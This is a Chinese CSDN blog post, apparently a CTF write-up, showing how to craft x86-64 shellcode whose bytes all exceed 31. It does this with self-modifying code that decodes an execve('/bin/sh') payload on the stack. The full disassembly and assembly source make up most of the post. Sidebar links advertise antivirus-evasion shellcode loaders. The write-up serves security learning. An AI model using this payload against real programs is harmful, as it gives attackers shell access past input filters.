Shellcode——绕过31

于 2023-10-26 22:51:24 发布
阅读量495 收藏
点赞数
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53932372/article/details/134066484
版权

遇到了一道ctf题目,要求shellcode的每一个字节都必须大于31。

如果没有这个限制的话:
在这里插入图片描述

这是最方便的了。

但是必须大于31.

所以我想,那就吧所有小于31的加上31,然后运行的时候这部分代码自己修改自己。

也就是SMC,,简称自修改代码。

要注意:
小端输入
rsp寻址

~/Desktop/111 
❯ objdump -d ./shellcode -M intel

./shellcode:     file format elf64-x86-64


Disassembly of section .text:

0000000000401000 <_start>:
  401000:	48 b8 32 41 37 32 32 	movabs rax,0x3232323232374132
  401007:	32 32 32 
  40100a:	50                   	push   rax
  40100b:	48 b8 31 f6 31 d2 b8 	movabs rax,0x32323bb8d231f631
  401012:	3b 32 32 
  401015:	50                   	push   rax
  401016:	48 b8 2f 73 68 32 57 	movabs rax,0xe78948573268732f
  40101d:	48 89 e7 
  401020:	50                   	push   rax
  401021:	48 b8 31 c0 48 bf 2f 	movabs rax,0x6e69622fbf48c031
  401028:	62 69 6e 
  40102b:	50                   	push   rax
  40102c:	68 32 32 32 32       	push   0x32323232
  401031:	68 32 32 32 32       	push   0x32323232
  401036:	68 32 32 32 32       	push   0x32323232
  40103b:	68 32 32 32 32       	push   0x32323232
  401040:	8a 44 24 2b          	mov    al,BYTE PTR [rsp+0x2b]
  401044:	2c 32                	sub    al,0x32
  401046:	88 44 24 2b          	mov    BYTE PTR [rsp+0x2b],al
  40104a:	8a 44 24 36          	mov    al,BYTE PTR [rsp+0x36]
  40104e:	2c 32                	sub    al,0x32
  401050:	88 44 24 36          	mov    BYTE PTR [rsp+0x36],al
  401054:	8a 44 24 37          	mov    al,BYTE PTR [rsp+0x37]
  401058:	2c 32                	sub    al,0x32
  40105a:	88 44 24 37          	mov    BYTE PTR [rsp+0x37],al
  40105e:	8a 44 24 38          	mov    al,BYTE PTR [rsp+0x38]
  401062:	2c 32                	sub    al,0x32
  401064:	88 44 24 38          	mov    BYTE PTR [rsp+0x38],al
  401068:	8a 44 24 39          	mov    al,BYTE PTR [rsp+0x39]
  40106c:	2c 32                	sub    al,0x32
  40106e:	88 44 24 39          	mov    BYTE PTR [rsp+0x39],al
  401072:	8a 44 24 3a          	mov    al,BYTE PTR [rsp+0x3a]
  401076:	2c 32                	sub    al,0x32
  401078:	88 44 24 3a          	mov    BYTE PTR [rsp+0x3a],al
  40107c:	48 83 c4 20          	add    rsp,0x20
  401080:	48 89 e7             	mov    rdi,rsp
  401083:	ff e7                	jmp    rdi

asm代码:

section .text
    global _start

_start:
    ; 打开 /bin/sh
    mov rax, 0x3232323232374132
    push rax

    ;11
    mov rax, 0x32323bb8d231f631
    push rax

    ;22 23
    mov rax, 0xe78948573268732f
    push rax

    ;24 25 26 27 28 29 30 31
    mov rax, 0x6e69622fbf48c031
    push rax

    push 0x32323232
    push 0x32323232  
    push 0x32323232  
    push 0x32323232

    mov al, [rsp+31+12]
    sub al, 0x32
    mov [rsp+31+12], al

    mov al, [rsp+31+23]
    sub al, 0x32
    mov [rsp+31+23], al

    mov al, [rsp+31+24]
    sub al, 0x32
    mov [rsp+31+24], al

    mov al, [rsp+31+25]
    sub al, 0x32
    mov [rsp+31+25], al

    mov al, [rsp+31+26]
    sub al, 0x32
    mov [rsp+31+26], al

    mov al, [rsp+31+27]
    sub al, 0x32
    mov [rsp+31+27], al
    add rsp,32
    mov rdi,rsp
    jmp rdi

    ;mov rdi, rsp
    ;xor esi, esi
    ;xor edx, edx
    ;mov eax, 0x3b
    ;syscall
we have a whole life
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JsLoader:js免杀shellcode绕过杀毒添加自启
05-05
JsLoader文章:
绕过AV:免杀shellcode加载器
03-04
shellcode填至go_shellcode_encode.py生成重复后的base64有效负载然后将生成的payload填至main.go build(“ b64shellcode”)将main.go中的网址替换为您vbs的某个网页或文本(称为网页同样可以,但是需要程序可以...
Windows Shellcode学习笔记——通过VirtualProtect绕过DEP
weixin_34004576的博客
09-20 1812
本文讲的是Windows Shellcode学习笔记——通过VirtualProtect绕过DEP, 0x00 前言 在掌握了栈溢出的基本原理和利用方法后,接下来就要研究如何绕过Windows系统对栈溢出利用的重重防护,所以测试环境也从xp转到了Win7(相比xp,Win7的防护更全面)。本文将要介绍经典的DEP绕过方法——通过VirtualProte...
Windows Shellcode学习笔记——利用VirtualAlloc绕过DEP
weixin_34268843的博客
09-19 555
本文讲的是Windows Shellcode学习笔记——利用VirtualAlloc绕过DEP, 0x00 前言 接着介绍DEP绕过的另一种方法——利用VirtualAlloc绕过DEP。通过VirtualAlloc函数可以申请一段具有可执行属性的内存,相比于VirtualProtect,传入VirtualAlloc的四个参数不需要先读取再赋值,可在s...
某大学信息安全竞赛——shellcode1 绕过strlen检查,绕过沙箱检查,执行orw shellcode拿到flag
fzucaicai的博客
05-14 1072
这是一道非常让人蛋疼的题目,之前我只听说过沙箱,但是并没有自己实际接触过沙箱这个保护机制,大概作用就是开了沙箱之后,会禁用掉某些函数,一旦我们使用了这个函数,比如我们在栈溢出构造ROP,或者写入shellcode执行时,只要含有这些函数,这个程序就会崩掉,这题目就开了沙箱。之前我有个疑问,这里明明没有exevce函数的引用,为什么我用pwntools工具写的 shellcode = asm(shellcraft.sh())或者网上抄来的execve(binsh)都不能打通呢??
加密shellcode绕过AV.zip
03-23
加密shellcode绕过AV
Custom Shellcode
05-16
Custom Shellcode 代码参考.
基于python pyd的shellcode免杀绕过+源代码+文档说明
12-01
根据目前的测试效果,可以绕过360和火绒。 -------- 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! <项目介绍> 1、该资源内项目代码都经过测试...
Java项目-基于Springboot+Vue的会员制医疗预约系统设计与实现(源码+数据库脚本+部署视频+代码讲解视频+全套软件
06-19
【基于Springboot+Vue的会员制医疗预约服务管理信息系统的设计与实现】高分通过项目,已获导师指导。 本项目是一套基于Springboot+Vue的会员制医疗预约服务管理信息系统,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的Java学习者。也可作为课程设计、期末大作业 包含:项目源码、数据库脚本、开发说明文档、部署视频、代码讲解视频、全套软件等,该项目可以直接作为毕设使用。 项目都经过严格调试,确保可以运行! 项目详情: https://blog.csdn.net/u011832806/article/details/138750441
protobuf-3.19.3-cp38-cp38-manylinux2014_aarch64.whl
06-19
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
HiMall2.6多用户B2B2C商城源码.zip
06-19
生态级B2B2C盈利模式商业平台。完备的电商功能,为企业提升了行业电商品牌的美誉度。系统安全、稳定、快速,便捷的功能扩展及可以进行二次开发的商城源码,为企业电商业务长线快速发展提供了强有力的保障。 适用企业:各类百货MALL、行业实体市场、电商产业园、行业协会、行业门户网站等。
protobuf-3.19.3-cp310-cp310-win_amd64.whl
06-19
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
protobuf-3.11.2-cp37-cp37m-win32.whl
06-19
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
protobuf-3.17.0-cp36-cp36m-win_amd64.whl
最新发布
06-19
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
cryptography-1.3.3-cp35-none-win32.whl
06-19
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
小程序版CNN图像分类识别动物体型-不含数据集图片-含逐行注释和说明文档.zip
06-19
本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代码的整体介绍 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01数据集文本生成制作.py,是将数据集文件夹下的图片路径和对应的标签生成txt格式,划分了训练集和验证集 运行02深度学习模型训练.py,
Java中的简单游戏和应用程序及源代码+使用说明+可做毕设
06-19
项目名称:Java中的简单游戏和应用程序 项目简介: 简单游戏和应用程序是一个Java项目。该项目包含23个不同的Java制作的应用程序和游戏。项目中还包括记事本、拼图等简单应用程序。这是一个单框架程序,你可以选择并运行你希望运行的程序。要运行此项目,你必须在系统上安装JDK路径。 项目简介: 这是一个简单的游戏和应用程序集合,由不同的Java应用程序组成,使该项目独特。你可以选择要运行的程序。如果你想运行记事本,只需在应用程序中点击选项。在记事本中,你可以轻松进行写作,可以处理任何你想要的文本样式。 此外,该项目还包括游戏和测验,例如井字棋和拼图游戏。项目中还提供了字数统计功能。你可以输入任意多的文本,之后可以统计段落中的字数。你还可以玩数独和太空侵略者游戏。不仅如此,你还可以在这个项目中运行不同的应用程序。 项目功能: 记事本:进行文本写作和格式处理。 拼图游戏:挑战你的智力。 井字棋:经典的两人游戏。 字数统计:统计输入文本的字数。 数独:经典的数字填空游戏。 太空侵略者:经典的射击游戏。 其他应用程序和游戏:总计23个不同的程序。 该项目为国外大神项目,可以作为毕业设计的项目,也可以作为大作业项目,不用担心代码重复,设计重复等,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。
达梦读写分离集群搭建文档
06-19
达梦读写分离集群搭建文档
shellcode downloader
01-08
Shellcode downloader(壳代码下载器)是一种恶意软件的一部分,用于在受感染的系统上下载和执行恶意shellcode。它通常由黑客或攻击者利用系统的弱点,如漏洞或错误配置,将其注入到受感染系统的进程中。 Shellcode...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值